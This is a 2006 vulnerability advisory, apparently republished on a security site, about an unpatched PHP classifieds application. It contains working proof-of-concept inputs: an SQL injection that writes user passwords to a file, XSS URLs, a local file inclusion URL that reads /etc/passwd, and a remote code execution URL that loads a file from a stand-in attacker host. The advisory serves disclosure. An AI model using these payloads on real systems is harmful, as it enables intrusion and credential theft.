Noah's classifieds multiple vulnerabilities

2006.02.23
Credit: trueend5
Risk: High
Local: Yes
Remote: Yes
CWE: N/A


Ogólna skala CVSS: 6.4/10
Znaczenie: 4.9/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Brak
Wpływ na dostępność: Częściowy

KAPDA New advisory Vendor: http://classifieds.phpoutsourcing.com Vulnerable: Noah`s classifieds 1.3 and below (classifieds component for mambo also may be affected) Bug: Path Disclosure,Sql Injection,XSS,Local file inclusion,Remote code execution Exploitation: Remote with browser Exploit:available Description: -------------------- Noah' Classifieds is a general purpose application that allows you to set up as many ad categories as you want specifying custom fields for each of them. Vulnerabilities: -------------------- Path disclosure (direct access to include files) http://example.com/classifieds/gorum/category.php -------------------------- -------------------------- Sql Injection: (search tool, HTTP method:POST, condition: mysql user with file privilege) kapda%')))/**/UNION/**/SELECT/**/1,1,1,name,1,1,1,1,1,1,1,1,1,1,1,1,1,1, 1,1,1,1,1,1,password/**/INTO/**/OUTFILE/**/'/installation_path/lang/resu lt.text'/**/FROM/**/classifieds_classifiedsuser# -------------------------- -------------------------- Cross site scripting 1- http://example.com/classifieds/index.php?inf=%3Cscript%3Ealert(document. cookie)%3C/script%3E /gorum/gorumlib.php if( isset($HTTP_GET_VARS["inf"]) ) $infoText=$HTTP_GET_VARS["inf"]; $sApp=$init->showApp(); $s.=$globHtmlHead;//fontos, hogy felulirhato legyen az app-ban --- 2- http://example.com/classifieds/index.php?upperTemplate=%3Cscript%3Ealert (document.cookie)%3C/script%3E (condition:rgister_globals=On) -------------------------- -------------------------- Local file inclusion (condition: magic_quotes_gpc=Off For none php files ) http://example.com/classifieds/index.php?otherTemplate=/../../../etc/pas swd%00 /include.php if (isset($otherTemplate)) { include("./template$otherTemplate.php"); } else include("./template.php"); -------------------------- -------------------------- Remote code execution (condition: register_globals=On) http://example.com/classifieds/index.php?lowerTemplate=http://evilsite.c om/evilfile.php /gorum/constants.php if (!isset($upperTemplate)) $upperTemplate = "<body>n"; if (!isset($lowerTemplate)) $lowerTemplate = "</body>"; /gorum/gorumlib.php if (ereg(".php$",$upperTemplate)) {//just check $ret=@fopen($upperTemplate,"r"); if (!$ret) { $infoText = sprintf($lll["incl_header_err"],$upperTemplate); } @fclose($f); } if (ereg(".php$",$lowerTemplate)) {//just check $ret=@fopen($lowerTemplate,"r"); if (!$ret) { if (!isset($infoText)) $infoText=""; $infoText.="<br>".sprintf($lll["incl_footer_err"],$lowerTemplate); } @fclose($f); } . . . $upperTemplate=trim($upperTemplate); if (ereg(".php$",$upperTemplate)) { $ret=@include($upperTemplate); } else $s.="$upperTemplaten"; $lowerTemplate=trim($lowerTemplate); $s.=$sApp; if (ereg(".php$",$lowerTemplate)) $ret=@include($lowerTemplate); else $s.="$lowerTemplaten"; } More details with Exploit --------- http://www.kapda.ir/advisory-268.html In Farsi: http://irannetjob.com/content/view/198/28/ Solution: --------- There is no vendor supplied patch for this issue. From Vendor`s website: "Currently, we are completely overloaded with our running projects, and we don't have enough time to deal with our free products. The further development and support of Noah's Classifieds is therefore suspended. Thank you for the understanding and please forgive us that we don't responding to the emails." Credit : --------- Discovered & released by trueend5 (trueend5 kapda ir) Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top